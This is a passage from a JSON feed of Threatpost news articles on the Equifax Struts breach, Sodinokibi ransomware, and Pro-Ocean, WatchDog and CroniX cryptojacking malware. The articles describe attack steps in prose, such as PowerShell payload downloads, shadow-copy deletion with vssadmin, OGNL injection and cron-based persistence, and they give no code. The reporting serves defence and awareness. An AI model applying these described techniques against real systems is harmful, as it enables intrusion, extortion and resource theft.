Without runtime protection in place, they have to do this every time a new library vulnerability comes out,\u201d Williams said.\n\nThe vulnerability, a flaw in the Jakarta Multipart parser upload function in Apache Struts 2, allowed an attacker to execute code on a vulnerable server by sending a maliciously crafted request. The vulnerability, which first surfaced on Chinese forums before it was discovered by researchers with Cisco Talos, [was patched back in March](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>) but proof of concept exploit code quickly found its way into Metasploit. Public scans and attacks spiked immediately following disclosure of the vulnerability and at least one campaign was found [installing Cerber ransomware](<https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/>) on vulnerable servers.\n\nFamed cryptographer Bruce Schneier, CTO of IBM Resilient, [weighed in](<https://www.schneier.com/blog/archives/2017/09/on_the_equifax_.html>) on the Equifax fiasco on Wednesday and, as he has argued recent IoT issues [have necessitated](<https://threatpost.com/legislation-proposed-to-secure-connected-iot-devices/127152/>), suggested the only solution to preventing breaches like this from happening again is government intervention.\n\n\u201cBy regulating the security practices of companies that store our data, and fining companies that fail to comply, governments can raise the cost of insecurity high enough that security becomes a cheaper alternative,\u201d Schneier wrote, \u201cThey can do the same thing by giving individuals affected by these breaches the ability to sue successfully, citing the exposure of personal data itself as a harm.\u201d\n\nFittingly, as if to get the ball rolling, on Wednesday U.S. Sen. 
Mark Warner (D-VA) asked the Federal Trade Commission to look into the breach and the company\u2019s security practices, namely whether Equifax has adequate cybersecurity safeguards in place for the amount of personally identifiable information it deals with.\n\n\u201cThe volume and sensitivity of the data potentially involved in this breach raises serious questions about whether firms like Equifax adequately protect the enormous amounts of sensitive data they gather and commercialize,\u201d [Warner wrote](<https://www.scribd.com/document/358810691/Sen-Warner-Asks-FTC-to-Probe-Equifax>), \u201cIn ways similar to the financial service industry\u2019s systemic risk designation, I fear that firms like Equifax may illustrate a set of institutions whose activities, left unchecked, can significantly threaten the economic security of Americans.\u201d\n\nThe letter came a few days after members of the U.S. Senate Finance Committee, including Sen. Orrin Hatch (R-UT) and Sen. Ron Wyden (D-OR), sent another letter to Equifax CEO Richard Smith asking for additional information about the breach.\n\n\u201cThe scope and scale of this breach appears to make it one of the largest on record, and the sensitivity of the information compromised may make it the most costly to taxpayers and consumers,\u201d the senators wrote in a [letter](<https://www.finance.senate.gov/download/91117-equifax-release>) on Monday.\n\nWhile the FTC doesn\u2019t typically comment on ongoing investigations, the Commission did confirm Thursday afternoon that, because of the \u201cintense public interest\u201d and \u201cpotential impact of this matter,\u201d it was looking into the breach.\n\nEquifax said Americans and an undisclosed number of Canadian and United Kingdom residents were affected by the breach, but security news site [KrebsonSecurity.com](<https://krebsonsecurity.com/2017/09/ayuda-help-equifax-has-my-data/>) said this week Argentines may be implicated as well. 
Brian Krebs, who authors the site, says he was contacted by Alex Holden, who runs the firm Hold Security, earlier this week. Two of Holden\u2019s employees, Argentine natives, discovered an Equifax portal for employees in Argentina that included their names, email addresses, and DNI \u2013 the Argentine equivalent of a Social Security Number.\n\nThe site, according to Holden, \u201cwas wide open, protected by perhaps the most easy-to-guess password combination ever: \u201cadmin/admin.\u201d Krebs says the portal was disabled after he notified Equifax\u2019s attorney and that the company is looking into how it may have been left unsecured.\n", "cvss3": {}, "published": "2017-09-14T16:00:34", "type": "threatpost", "title": "Equifax Confirms March Struts Vulnerability Behind Breach", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-15T13:01:13", "id": "THREATPOST:9E84C27A33C751DE6ECC9BAAF9C0F19B", "href": "https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-04-08T11:51:51", "description": "A recently-disclosed critical vulnerability in Oracle WebLogic is being actively exploited in a slew of attacks, which are distributing a never-before-seen ransomware variant.\n\nThe recently-patched flaw exists in Oracle\u2019s WebLogic server, used for building and deploying enterprise applications. 
The deserialization vulnerability ([CVE-2019-2725](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html>)) is being exploited to spread what researchers with Cisco Talos in a [Tuesday analysis](<https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html>) dubbed the \u201cSodinokibi\u201d ransomware.\n\n\u201cThis is the first time we have seen this ransomware being used in the wild,\u201d Jaeson Schultz, technical leader at Cisco Talos, told Threatpost. \u201cThis new ransomware first emerged on April 26. Part of what makes this ransomware stick out is the fact that attackers were using a 0-day vulnerability to install it. Talos is continuing to analyze the ransomware itself. It\u2019s obfuscated and there are several anti-analysis tricks.\u201d\n\nThe critical flaw, which has a CVSS score of 9.8, is a remote code execution bug that is exploitable over the network without authentication. Impacted are versions 10.3.6.0.0 and 12.1.3.0.0 of the product. 
The flaw was patched on April 26 \u2013 but researchers said that attackers have been exploiting the flaw since April 21.\n\n\u201cDue to the severity of this vulnerability, Oracle recommends that this Security Alert be applied as soon as possible,\u201d Eric Maurice, director of security assurance at Oracle, said in a [recent post](<https://blogs.oracle.com/security/security-alert-cve-2019-2725-released>) about the vulnerability.\n\nThe ransomware first came onto researchers\u2019 radar on April 25 (the day before a patch was released), after attackers attempted to make an HTTP connection with a vulnerable Oracle WebLogic server.\n\nWhile Cisco Talos researchers would not disclose further details to Threatpost regarding the victim of this particular ransomware attack \u2013 such as the company size or industry \u2013 they said they do think multiple victims are being targeted.\n\n\u201cAttackers were ultimately successful at encrypting a number of customer systems during this incident,\u201d they said.\n\nWhile typically ransomware variants require some form of user interaction \u2013 such as opening an attachment to an email message or clicking on a malicious link \u2013 this incident was abnormal as attackers simply leveraged the Oracle WebLogic vulnerability, researchers said.\n\nRansomware Note\n\nOnce attackers found a vulnerable server, they sent an HTTP POST request to that server. 
The request contained a PowerShell command, which downloaded a file called \u201cradm.exe.\u201d That then saved the ransomware locally and executed it.\n\nOnce downloaded, the ransomware encrypted the victim\u2019s systems and displayed a ransom note to them, directing victims to a page on the Tor network or to a domain (decryptor[.]top) on the public web, which was registered on March 31 this year.\n\nAfter victims visited said pages, they were directed to create a Bitcoin wallet and purchase $2500 (USD) worth of Bitcoin. They then were directed to transfer the Bitcoin to an address provided by the attackers. After the transaction is confirmed on the Blockchain, the attackers update the page with a link to download the decryptor, researchers told Threatpost.\n\nResearchers also noted that, once downloaded, the malicious file executed vssadmin.exe, a legitimate utility bundled with Windows that allows administrators to manage the shadow copies that are on the computer. Shadow copies are a technology that enables systems to take automatic backup copies of computer files.\n\nBecause attackers executed this feature, it allows them to access and delete the automatic backups \u2013 making it harder for victims to recover their data: \u201cThis action is a common [tactic] of ransomware to prevent users from easily recovering their data,\u201d researchers said. 
\u201cIt attempts to delete default Windows backup mechanisms, otherwise known as \u2018shadow copies,\u2019 to prevent recovery of the original files from these backups.\u201d\n\nWhile researchers told Threatpost they\u2019re not sure who is behind the attack, they did note that after the ransomware deployment, attackers followed up with an additional exploit attempt (of the CVE-2019-2725 vulnerability) approximately eight hours later.\n\nInterestingly, this attack utilized the infamous [Gandcrab ransomware](<https://threatpost.com/tag/gandcrab-ransomware/>) (v5.2), making researchers believe that the attacker is a Gandcrab ransomware affiliate member, Schultz told Threatpost.\n\n\u201cWe find it strange the attackers would choose to distribute additional, different ransomware on the same target,\u201d researchers said. \u201cSodinokibi being a new flavor of ransomware, perhaps the attackers felt their earlier attempts had been unsuccessful and were still looking to cash in by distributing Gandcrab.\u201d\n\nLooking forward, researchers said that they expect attacks on Oracle\u2019s WebLogic servers to increase, and urge users to update immediately. 
This flaw was not part of Oracle\u2019s regularly-scheduled quarterly patch earlier in [April](<https://threatpost.com/oracle-squashes-53-critical-bugs-in-april-security-update/143845/>), where it fixed 53 other critical vulnerabilities in Oracle products.\n\n\u201cDue to the ubiquity of Oracle WebLogic servers and the ease of exploitation of this vulnerability, Talos expects widespread attacks involving CVE-2019-2725,\u201d they said.\n", "cvss3": {}, "published": "2019-04-30T19:20:13", "type": "threatpost", "title": "New 'Sodinokibi' Ransomware Exploits Critical Oracle WebLogic Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-2725", "CVE-2020-0688"], "modified": "2019-04-30T19:20:13", "id": "THREATPOST:4DD624E32718A8990263A37199EEBD02", "href": "https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-01-28T21:55:45", "description": "Researchers have identified an updated malware variant used by the cybercrime gang Rocke Group that targets cloud infrastructures with crypto-jacking attacks.\n\nThe malware is called Pro-Ocean, which was first discovered in 2019, and has now been beefed-up with \u201cworm\u201d capabilities and rootkit detection-evasion features.\n\n\u201cThis malware is an example that demonstrates that cloud providers\u2019 agent-based security solutions may not be enough to prevent evasive malware targeted at public cloud infrastructure,\u201d said Aviv Sasson with Palo Alto Networks [on Thursday](<https://unit42.paloaltonetworks.com/pro-ocean-rocke-groups-new-cryptojacking-malware/>). 
\u201cAs we saw, this sample has the capability to delete some cloud providers\u2019 agents and evade their detection.\u201d\n\nSince [its discovery in 2018](<https://threatpost.com/new-threat-actor-rocke-a-rising-monero-cryptomining-menace/137090/>), the Rocke Group has widened its [targeting of cloud applications](<https://threatpost.com/cryptomining-malware-uninstalls-cloud-security-products/140959/>) \u2013 including Apache ActiveMQ, Oracle WebLogic and open-source data structure store Redis \u2013 for mining Monero. Researchers say that since these attacks initially broke out, many cybersecurity companies have kept Pro-Ocean on their radar. Rocke Group\u2019s latest update aims to sidestep these detection and mitigation efforts.\n\n## **Pro-Ocean Malware**\n\nPro-Ocean uses a variety of known vulnerabilities to target cloud applications. These include a [critical flaw in Apache ActiveMQ](<https://nvd.nist.gov/vuln/detail/CVE-2016-3088>) (CVE-2016-3088) and [a high-severity vulnerability](<https://nvd.nist.gov/vuln/detail/CVE-2017-10271>) in Oracle WebLogic (CVE-2017-10271). The malware has also been spotted targeting unsecure instances of Redis.\n\nOnce downloaded, the malware attempts to remove other malware and cryptominers, including [Luoxk](<https://blog.netlab.360.com/malicious-campaign-luoxk-is-actively-exploiting-cve-2018-2893/>), [BillGates](<https://www.akamai.com/us/en/multimedia/documents/state-of-the-internet/bill-gates-botnet-threat-advisory.pdf>), [XMRig](<https://threatpost.com/new-cryptominer-distributes-xmrig-in-aggressive-attacks/132027/>) and [Hashfish](<https://virus-removal-guide.net/34710-is-the-hashfish-exe-file-legal-how-to-remove-hashfish-exe-trojan-coinminer/>). 
It then kills any processes using the CPU heavily, so that its XMRig miner can utilize 100 percent of the CPU juice needed to sow Monero.\n\nThe malware is made up of four components: A rootkit module that installs a rootkit and other various malicious services; a mining module that runs the XMRig miner; a Watchdog module that executes two Bash scripts (these check that the malware is running and search any processes using CPU heavily); and an infection module that contains \u201cworm\u201d capabilities.\n\n## **New Features**\n\nThe latter \u201cworm\u201d feature is a new addition for Pro-Ocean, which previously only infected victims manually. The malware now uses a Python infection script to retrieve the public IP address of the victim\u2019s machine. It does so by accessing an online service with the address \u201cident.me,\u201d which returns the public IP address of the requesting host. Then, the script tries to infect all the machines in the same 16-bit subnet (e.g. 10.0.X.X).\n\n\u201cIt does this by blindly executing public exploits one after the other in the hope of finding unpatched software it can exploit,\u201d said Sasson.\n\nPro-Ocean\u2019s modular structure. Credit: Palo Alto Networks\n\nOther threat groups have previously adopted worm-like functionality into their Monero-chugging malware. TeamTNT\u2019s cryptomining worm, for instance, [was found spreading through](<https://threatpost.com/aws-cryptojacking-worm-cloud/158427/>) the Amazon Web Services (AWS) cloud and collecting credentials in August.\n\nThe Pro-Ocean malware has also added new rootkit capabilities that cloak its malicious activity.\n\nThese updated features exist in [Libprocesshider](<https://github.com/gianlucaborello/libprocesshider>), a library for hiding processes used by the malware. 
This library was utilized by previous versions of Pro-Ocean \u2013 however, in the new version, the developer of the code has added several new code snippets to the library for further functionalities.\n\nFor example, before calling the libc function open (libc is a library of standard functions that can be used by all C programs), a malicious function determines whether the file needs to be hidden to obfuscate malicious activities.\n\n\u201cIf it determines that the file needs to be hidden, the malicious function will return a \u2018No such file or directory\u2019 error, as if the file in question does not exist,\u201d said Sasson.\n\nResearchers said they believe that the Rocke Group will continue to actively update its malware, particularly as the [cloud grows as a lucrative target for attackers](<https://threatpost.com/cloud-attacks-bypass-mfa-feds/163056/>).\n\n\u201cCryptojacking malware targeting the cloud is evolving as attackers understand the potential of that environment to mine for crypto coins. We previously saw simpler attacks by the Rocke Group, but it seems this group presents an ongoing, growing threat. This cloud-targeted malware is not something ordinary since it has worm and rootkit capabilities. We can assume that the growing trend of sophisticated attacks on the cloud will continue.\u201d\n", "cvss3": {}, "published": "2021-01-28T20:06:57", "type": "threatpost", "title": "Rocke Group\u2019s Malware Now Has Worm Capabilities", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-3088", "CVE-2017-10271", "CVE-2018-2893"], "modified": "2021-01-28T20:06:57", "id": "THREATPOST:D3FA06D667A0B326C1598C8BCD106E7D", "href": "https://threatpost.com/rocke-groups-malware-now-has-worm-capabilities/163463/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-17T21:39:31", "description": "Cryptocurrency-mining malware, called WatchDog, has been running under the radar for more than two years \u2013 in what researchers call one of the largest and longest-lasting Monero cryptojacking attacks to date.\n\nThe attack is still in operation as of this writing \u2013 and due to the size and scope of the infrastructure, it will be difficult to fully contain, researchers told Threatpost. Thus far, attackers have hijacked at least 476 Windows and Linux devices, in order to abuse their system resources for mining Monero cryptocurrency.\n\nRight now, the attackers behind this campaign are sticking to cryptojacking \u2013 but researchers warn that it is \u201chighly likely\u201d they could find identity and access management (IAM) data on previously-compromised cloud systems, due to the root and administrative access that\u2019s acquired during the malware implantation. 
This could open the door for future \u2013 and more dangerous \u2013 attacks.\n\n\u201cIt is clear that the WatchDog operators are skilled coders and have enjoyed a relative lack of attention regarding their mining operations,\u201d said researchers with Palo Alto Networks [on Wednesday](<https://unit42.paloaltonetworks.com/watchdog-cryptojacking/>). \u201cWhile there is currently no indication of additional cloud compromising activity at present (i.e. the capturing of cloud platform identity and access management credentials, access ID or keys), there could be potential for further cloud account compromise.\u201d\n\n## **How Much Money Does Cryptomining Malware Make?**\n\nThe attack is a [prime example of cryptojacking](<https://threatpost.com/cryptojacking-attack-found-on-los-angeles-times-website/130041/>), which is when attackers leverage malicious cryptomining for financial profit. They do so by hacking into devices to install software, which then uses the devices\u2019 power and resources to mine for cryptocurrencies or to steal cryptocurrency wallets owned by the victims.\n\nSince it launched on Jan. 27, 2019, the WatchDog mining operation has collected at least 209 Monero cryptocurrency coins (XMR) \u2013 which is currently valued at $32,056. While this figure appears to be relatively low, the important piece of cryptojacking operations is not the immediate market price, but the total XMR mined, Nathaniel Quist, senior cloud threat researcher for Unit 42 at Palo Alto Networks, told Threatpost.\n\nAt the time of writing the research, the market price for Monero was $153. But, just within the last 24 hours, the market price of XMR has soared to $254, Quist explained \u2013 so as of Wednesday, WatchDog has actually collected $53,086.\n\n\u201cIn the past, we have seen dramatic swings in cryptocurrency valuations,\u201d Quist told Threatpost. 
\u201cDepending upon the market price over the next months, we could see cryptocurrency market prices touch the record highs that were seen back in early 2018, where Monero was valued at $469. If that were the case, WatchDog could increase its value total to $98,021 without mining another coin, making it a very profitable mining operation.\u201d\n\n## **WatchDog Malware: Go Binaries Drive Functionality**\n\nResearchers said the WatchDog mining malware is composed of a three-part Go Language binary set and a bash or PowerShell script file. Go, an open-source programming language, has previously been utilized by various cybercriminals for cryptojacking attacks, [including TeamTNT](<https://threatpost.com/blackt-cryptojacker-teamtnt/159853/>) and [the developers of ElectroRAT](<https://threatpost.com/electrorat-drains-cryptocurrency-wallet-funds-of-thousands/162705/>).\n\nWatchDog\u2019s Go binaries each perform a specific functionality \u2013 including one that emulates the Linux watchdog daemon functionality (hence the name of the malware, WatchDog) by ensuring that the mining process does not overload or stop unexpectedly. The watchdog daemon\u2019s functionality is to open the device and provide a necessary refresh to keep the system from resetting. For example, it can test process table space, memory usage and running processes.\n\n\u201cWatchDog\u2019s usage of Go binaries allows it to perform the stated operations across different operating systems using the same binaries\u2026 as long as the Go Language platform is installed on the target system,\u201d said researchers.\n\nThe Go binaries include a network scanner and exploitation binary (networkmanager), a process monitoring binary (phpguard), and a version of the malicious XMRig cryptomining software (phpupdate).\n\n## **The WatchDog Cryptojacking Campaign: Windows and Linux OS Under Attack**\n\nThe initial attack vector stems from the networkmanager binary. 
When the binary identifies a vulnerable target, it attempts to compromise that identified system using a robust set of built-in application exploits.\n\nSpecifically, networkmanager comes loaded with 33 exploits, 32 individual remote code execution (RCE) functions and several shell grab functions. For instance, it scans for applications such as Elasticsearch servers that are vulnerable to CVE-2015-1427 and CVE-2014-3120 and Oracle WebLogic Servers vulnerable to CVE-2017-10271.\n\nFor context, this is a significant amount of exploits when compared to other miners \u2013 [such as the Smominru cryptocurrency miner](<https://threatpost.com/massive-smominru-cryptocurrency-botnet-rakes-in-millions/129726/>), which operated from 2017 to 2018 and collected nearly 9,000 XMR, said Quist. Unlike Smominru\u2019s two exploits, WatchDog\u2019s numerous exploits and RCE functions \u201cmake it better at compromising exposed systems,\u201d he told Threatpost.\n\n## **WatchDog Compared to Graboid Cryptomining Malware**\n\nOf note, WatchDog is stealthier than other cryptomining malware, such as the wormable [Monero mining malware Graboid](<https://threatpost.com/docker-containers-graboid-crypto-worm/149235/>). Discovered last year, Graboid was the largest known mining operation to date in terms of the total number of active systems.\n\nDuring the time of its operation, Graboid consisted of at least 2,000 exposed and compromised Docker Daemon APIs systems, and researchers said the malware could have also achieved \u201chigher processing speeds\u201d due to the configuration script utilizing all available container central processing units (CPUs).\n\nHowever, Graboid was only known to operate for up to three months before its Docker Hub images were removed. 
That\u2019s because the malware relied on a third-party (Docker Hub) to host its malicious payload \u2013 whereas WatchDog does not, allowing it to have remained active for more than two years, said researchers.\n\nIn fact, WatchDog has a fairly extensive infrastructure behind its mining operations, with researchers mapping out 18 root IP endpoints and seven malicious domains, which serve at least 125 malicious URL addresses used to download its toolset.\n\n## **Cryptojacking: A Cyberattack on the Rise**\n\nWatchDog comes as the value of cryptocurrency has exploded, making cryptojacking a lucrative type of financial attack for cybercriminals. The XMR market value follows the cryptocurrency prices of Bitcoin \u2013 which as of Wednesday set a record-high topping $51,000.\n\nXMR has subsequently increased in value from $153 on February 9 to $254 on Wednesday \u2013 approaching its highest-recorded value of $469.79 (set in January 2018), Quist told Threatpost.\n\n\u201cCybercriminals are watching the market value of XMR,\u201d Quist told Threatpost. \u201cOver the last six months, Unit 42 researchers have seen a 40 percent increase in network traffic to public mining pools, which indicates that more mining operations are taking place. The trend of more XMR mining operations appears to be following the increasing market value price of XMR.\u201d\n\nThis week, researchers with Kaspersky also found that distributed denial-of-service (DDoS) attacks dropped significantly at the end of 2020, down 31 percent in the fourth quarter, as cybercriminals switch their efforts to cryptomining. 
[According to the analysis this week](<https://threatpost.com/ddos-attacks-q4-cryptomining-resurgence/163998/>), cybercriminals began repurposing infected devices for cryptomining in response to rising cryptocurrency values.\n\nOne such [recently discovered malware](<https://threatpost.com/new-malware-hijacks-kubernetes-clusters-to-mine-monero/163629/>), dubbed Hildegard, was found being leveraged by the TeamTNT threat group to target Kubernetes clusters with cryptojacking attacks. In January, [researchers also identified an updated malware variant](<https://threatpost.com/rocke-groups-malware-now-has-worm-capabilities/163463/>) used by the cybercrime gang Rocke Group that targets cloud infrastructures with crypto-jacking attacks. And, in January, [researchers dug up new discoveries](<https://threatpost.com/sql-server-malware-tied-to-iranian-software-firm-researchers-allege/163230/>) surrounding a cryptomining operation, called MrbMiner, which was downloading a cryptominer on thousands of internet-facing SQL servers.\n", "cvss3": {}, "published": "2021-02-17T21:39:10", "type": "threatpost", "title": "Windows, Linux Devices Hijacked In Two-Year Cryptojacking Campaign", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-3120", "CVE-2015-1427", "CVE-2017-10271"], "modified": "2021-02-17T21:39:10", "id": "THREATPOST:555BCC102B10B8C6CABB0054595AC756", "href": "https://threatpost.com/windows-linux-devices-hijacked-in-two-year-cryptojacking-campaign/164048/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-10-30T07:20:19", "description": "The Apache Software Foundation warned in an advisory that the latest version of the Commons FileUpload library is susceptible to a two-year-old remote code execution flaw. Users of the vulnerable library must update their projects manually.\n\nThe critical bug in Commons FileUpload library is a known vulnerability ([CVE-2016-1000031](<http://mail-archives.us.apache.org/mod_mbox/www-announce/201811.mbox/%3CCAMopvkMo8WiP%3DfqVQuZ1Fyx%3D6CGz0Epzfe0gG5XAqP1wdJCoBQ%40mail.gmail.com%3E>)) that enables remote code execution in the open-source framework, which facilitates developing web applications in the Java programming language.\n\nEssentially, a Java object exists in the Apache Commons FileUpload library that can be manipulated so that when it is deserialized, it can write or copy files to disk in arbitrary locations.\n\n\u201cA remote attacker could exploit this vulnerability to take control of an affected system,\u201d according to the Monday [advisory](<http://mail-archives.us.apache.org/mod_mbox/www-announce/201811.mbox/%3CCAMopvkMo8WiP%3DfqVQuZ1Fyx%3D6CGz0Epzfe0gG5XAqP1wdJCoBQ%40mail.gmail.com%3E>). \u201cYour project is affected if it uses the built-in file upload mechanism of Struts 2, which defaults to the use of commons-fileupload. The updated commons-fileupload library is a drop-in replacement for the vulnerable version. 
Deployed applications can be hardened by replacing the commons-fileupload jar file in WEB-INF/lib with the fixed jar.\u201d\n\nThe vulnerable commons-fileupload library is used in Apache Struts versions 2.3.36 and prior, the Foundation said in a Monday advisory. They urged users to upgrade to the latest released version of Commons FileUpload library \u2013 which is 1.3.3.\n\nThe vulnerability is reminiscent of [CVE-2017-5638](<https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/>), another critical remote code execution Apache vulnerability behind the massive 2017 Equifax breach that led to the compromise of 143 million Americans\u2019 data.\n\nWhile that Apache Struts vulnerability (impacting the Jakarta based file upload Multipart parser) was patched back in March 2017, the consumer credit reporting agency didn\u2019t apply patches for two months after the flaw\u2019s disclosure \u2013 eventually leading to the groundbreaking breach.\n\nSimilarly, this latest deserialization vulnerability was disclosed and patched in commons-fileupload in [March,](<https://issues.apache.org/jira/browse/FILEUPLOAD-279>) but since then a new version of Struts that became available \u2013 the 2.3.36 version, which was released in October \u2013 has touted vulnerable versions of the library.\n\nStruts versions from 2.5.12 are not affected, as this newer version of Struts includes a patched commons-fileupload component.\n\nUsers can fix the risk by replacing the faulty library manually.\n\n\u201cThere is no simple \u2018new Struts version\u2019 to fix this,\u201d said Johannes Ullrich, dean of research at the SANS Institute, in a blog [post](<https://isc.sans.edu/diary/rss/24278>) on Monday. \u201cYou will have to swap out the commons-fileupload library manually.\u201d\n\n\u201cAnd while you are at it: Double check that you don\u2019t have any other copies of the vulnerable library sitting on your systems,\u201d he added. 
\u201cStruts isn\u2019t the only one using it, and others may have neglected to update it as well.\u201d\n\nIt is only the latest security issue to afflict Apache Struts \u2013 earlier in August for instance, a critical remote code-execution vulnerability in Apache Struts 2 was [disclosed](<https://threatpost.com/apache-struts-2-flaw-uncovered-more-critical-than-equifax-bug/136850/>).\n", "cvss3": {}, "published": "2018-11-06T12:27:15", "type": "threatpost", "title": "Apache Struts Warns Users of Two-Year-Old Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-1000031", "CVE-2017-5638", "CVE-2019-11043"], "modified": "2018-11-06T12:27:15", "id": "THREATPOST:A45826A8CDA7058392C4901D6AAD15F1", "href": "https://threatpost.com/apache-struts-warns-users-of-two-year-old-vulnerability/138820/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-03T05:58:59", "description": "It was only a matter of time before attacks were seen in the wild, and now it\u2019s happened. A known threat actor has mounted a large cryptomining campaign using the recently disclosed Apache Struts 2 critical remote code-execution vulnerability. It uses a new malware designed for persistence and stealth, dubbed CroniX.\n\nThe malware\u2019s snappy name comes from the fact that it uses the Cron tool for persistence and Xhide for launching executables with fake process names, according to researchers at F5 Labs, who analyzed the campaign.\n\nThe Apache Struts 2 namespace vulnerability ([CVE-2018-11776](<https://threatpost.com/apache-struts-2-flaw-uncovered-more-critical-than-equifax-bug/136850/>)) was disclosed just two weeks ago by researchers at Semmle. 
Researchers have warned that it has the potential to open the door to even more critical havoc than the bug at the root of the [infamous Equifax breach](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>), which was also an Apache Struts 2 flaw ([CVE-2017-5638](<https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/>)). That\u2019s quite a statement given that the attack resulted in the exposure of personally identifiable information (PII) of 147 million consumers, costing the Fortune 500 credit-reporting company more than $439 million in damages and leading to the resignation of several of its executives.\n\nThe new campaign makes use of one of the [proof-of-concept exploits](<https://threatpost.com/poc-code-surfaces-to-exploit-apache-struts-2-vulnerability/136921/>) that were published on GitHub and Twitter just days after the latest flaw was publicized. Adversaries are using it to gain unauthenticated remote code-execution capabilities on targeted Linux machines in order to install a [Monero cryptomining script](<https://threatpost.com/?s=monero>), F5 researchers said.\n\n\u201cAs with many other Apache Struts 2 vulnerabilities, CVE-2018-11776 allows attackers to inject Object-Graph Navigation Language (OGNL) expressions, which might contain malicious Java code that is evaluated under several circumstances,\u201d the team explained in [a posting](<https://www.f5.com/labs/articles/threat-intelligence/apache-struts-2-vulnerability--cve-2018-11776--exploited-in-cron>) Tuesday. \u201cThis time, the injection point is within the URL. 
The attacker sends a single HTTP request while injecting an OGNL expression that, once evaluated, executes shell commands to download and execute a malicious file.\u201d\n\nThey added, \u201cconsidering it\u2019s only been two weeks since this vulnerability was discovered, it\u2019s worth noting how fast attackers are weaponizing vulnerabilities and how quickly researchers are seeing them in the wild.\u201d\n\n**Analysis**\n\nTaking a closer look at the malware, the team saw that the malware downloads a file called \u201cH,\u201d which turns out to be an old XHide tool for launching executables with a fake process name, the researchers said. In this case, it launches a fork of the XMRig Monero miner, with an embedded configuration (pool, username and password), while changing the process name to the more innocuous-sounding \u201cjava.\u201d\n\nThe analysts also saw that three Cron jobs are used for persistence, with two of them refreshing the backdoor every day with downloads from the C2 server. Another job downloads a daily file named \u201canacrond,\u201d which saves itself in various Cron job files around the system. In all three cases, the scripts are used to connect to the C2 server and download the deployment bash script to restart the mining process; older versions of the scripts are then deleted off the system.\n\nCroniX is also competitive malware, locating and deleting the binaries of any previously installed cryptominers so as to claim all of the CPU resources for itself, F5 found.\n\n\u201cFor some miners, the attacker decides to take a more careful approach and check each process name and process CPU usage, and then kill only those processes that utilize 60 percent or more of the CPU resources,\u201d F5 researchers said. 
\u201cThis is probably done to avoid killing legitimate processes as the names of these miners (crond, sshd and syslogs) typically relate to legitimate programs on a Linux system.\u201d\n\nComparing the modus operandi of the operation, F5 researchers believe the actor is the same group that was behind a previous campaign exploiting Jenkins servers via [CVE-2017-1000353](<https://devcentral.f5.com/articles/jenkins-unsafe-deserialization-vulnerability-cve-2017-1000353-30142>). That campaign was uncovered two months ago.\n\n\u201cThe malware deployment pattern\u2026similar deployed file names and the quite unique usage of the XHide process-faker made us believe that the threat actor behind the exploitation of this fresh Struts 2 vulnerability is the same one,\u201d researchers noted in the analysis.\n\nOne difference is that in the previous campaign, the threat actor used a Chinese Git website to host malicious files. Here, the attackers are using a dedicated web server hosted in the U.S., along with domain names designating the Pacific island of Palau (.pw) \u2013 believed registered by a Russian registrant.\n\nWhile cryptomining can be seen as less destructive than [wiper malware,](<https://threatpost.com/secrets-of-the-wiper-inside-the-worlds-most-destructive-malware/131836/>) [ransomware](<https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/>) or Equifax-like [mass data exfiltration](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) (all of which can be carried out using this flaw), Jeannie Warner, security manager at WhiteHat Security, noted that exploit development tends to be faster for more widely embedded flaws, highlighting the importance of patching this particular issue immediately.\n\n\u201cApache Struts is used by some of the world\u2019s largest companies,\u201d she said via email. 
\u201cThe more common the vulnerability, the more it helps attackers simplify their process\u2026and the easier it becomes for non-skilled hackers to compromise more websites. Methods to exploit this newest Struts vulnerability are already available online, so it is absolutely critical that all companies implement the patch immediately. There\u2019s no time to waste.\u201d\n\nMore attacks should be anticipated; in fact, while Linux machines seem to be the target for this particular CroniX effort, the F5 analysis uncovered an additional file lurking on the server that seems tailored to Microsoft\u2019s OS.\n\n\u201c[The file] at /win/checking-test.hta holds a Visual Basic script that calls a Microsoft Windows cmd to run a PowerShell command on a targeted victim,\u201d researchers said. \u201cSo, it seems this threat actor is targeting Windows OS (not just Linux) using another operation hosted on the same server.\u201d\n", "cvss3": {}, "published": "2018-09-05T17:48:03", "type": "threatpost", "title": "Active Campaign Exploits Critical Apache Struts 2 Flaw in the Wild", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-1000353", "CVE-2017-5638", "CVE-2018-11776"], "modified": "2018-09-05T17:48:03", "id": "THREATPOST:D70CED5C745CA3779F2D02FBB6DBA717", "href": "https://threatpost.com/active-campaign-exploits-critical-apache-struts-2-flaw-in-the-wild/137207/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:25:45", "description": "Oracle is urging customers to fast-track a patch for a critical flaw in its WebLogic Server under active attack. The company said it has received numerous reports that attackers were targeting the vulnerability [patched last 